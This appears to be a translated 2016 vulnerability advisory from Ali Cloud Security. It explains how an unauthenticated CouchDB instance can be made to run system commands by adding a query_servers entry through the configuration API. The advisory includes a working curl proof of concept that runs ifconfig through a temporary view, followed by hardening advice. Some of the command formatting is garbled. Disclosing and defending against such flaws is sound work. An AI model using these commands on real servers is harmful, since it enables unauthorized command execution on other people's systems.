Ali Cloud Security · 2016/05/19 9:06

0 x00 preface

On May 16, ali Cloud Shield attack and defense team learned from external channels that CouchDB database had unauthorized access vulnerability (in the case of incorrect configuration). After testing, the Cloud Shield team took the lead to discover that using this unauthorized access vulnerability will not only cause data loss and disclosure, but also can execute arbitrary system commands. The cloud Shield security expert team immediately completed the vulnerability reporting, security rating, and informed all potentially affected users. The source and technical details of this vulnerability are explained in detail below.

0x01 The ins and outs of vulnerability

CouchDB is an open source document-oriented database management system accessible through the RESTful JavaScript Object Notation (JSON) API. By default, CouchDB provides Restful apis on port 5984 for database management.

So what’s the problem? If you scroll through the official description, CouchDB has a Query_Server configuration item, described in the official documentation as follows:

CouchDB delegates computation of design documents functions to external query servers. The external query server is a special OS process which communicates with CouchDB over standard input/output using a very simple line-based protocol with JSON messages.

CouchDB allows you to specify a binary program or script that interacts with and processes data with CouchDB. Query_server is formatted in the local.ini configuration file:

[query_servers]
LANGUAGE = PATH ARGS
Copy the code

By default, two query_Servers are already set in the configuration file:

[query_servers]
javascript = /usr/bin/couchjs /usr/share/couchdb/server/main.js
coffeescript = /usr/bin/couchjs /usr/share/couchdb/server/main-coffee.js
Copy the code

As you can see, CouchDB introduces external binaries in query_Server to execute commands. If we can change this configuration, we can use the database to execute commands, but this configuration is in the local.ini file. How to control this?

One interesting feature of CouchDB’s documentation is that it provides an API to change its configuration and save the changes to a configuration file:

The CouchDB Server Configuration API provide an interface to query and update the various configuration values within a running CouchDB instance

That is, in addition to the local.ini configuration file, CouchDB allows you to dynamically modify configuration properties through its own Restful APIS. Combined with the above, you can use an unauthorized CouchDB to execute system commands by modifying its Query_Server configuration.

POC of vulnerability 0x02

Added query_server configuration, run ifconfig command here

#! Shell curl -x PUT 'http://1.1.1.1:5984/_config/query_servers/cmd' -d '"/sbin/ifconfig >/ TMP /6666"'Copy the code

Create a temporary table and insert a record

#!shell
curl -X PUT 'http://1.1.1.1:5984/vultest'
curl -X PUT 'http://1.1.1.1:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
Copy the code

Call Query_Server to process the data

#! Shell curl -x POST 'http://1.1.1.1:5984/vultest/_temp_view? limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'Copy the code

After the command is executed, you can see that the specified command is successfully executed:

As for how to display the results of the execution, you can use your brains, welcome interaction.

0x03 Vulnerability Repair Suggestion:

Bind_address = 0.0.0.0 in /etc/couchdb/local.ini, change 0.0.0.0 to 127.0.0.1. And then save. Note: CouchDB is only accessible on this machine.

2. Set the access password (CouchDB needs to be restarted to take effect). In /etc/couchdb/local.ini, find the [admins] field to configure the password.

Attached: Reference link:

  • Blog.rot13.org/2010/11/tri…
  • Docs.couchdb.org/en/1.6.1/ap…
  • Docs.couchdb.org/en/1.6.1/in…
  • Docs.couchdb.org/en/1.6.1/co…